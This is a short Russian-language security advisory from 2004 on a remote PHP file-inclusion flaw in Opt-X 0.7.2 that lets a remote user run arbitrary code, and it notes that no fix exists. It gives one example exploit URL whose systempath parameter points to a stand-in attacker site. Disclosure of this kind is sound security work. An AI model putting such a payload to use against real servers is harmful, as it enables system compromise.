Удаленное выполнение PHP кода в Opt-X
| Дата публикации: | 26.02.2004 |
| Всего просмотров: | 3981 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Opt-X 0.7.x |
| Уязвимые версии: Opt-X 0.7.2
Описание: Уязвимость обнаружена в Opt-X. Удаленный пользователь может выполнить произвольный PHP код на целевой системе. Пример/Эксплоит: http://[target]/path_of_optx/i ncludes/header.php?systempath=http://[attackersite]/ URL производителя: http://www.opt-x.org/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | H2004-10SA (security advisory): file inclusion vulnerability in |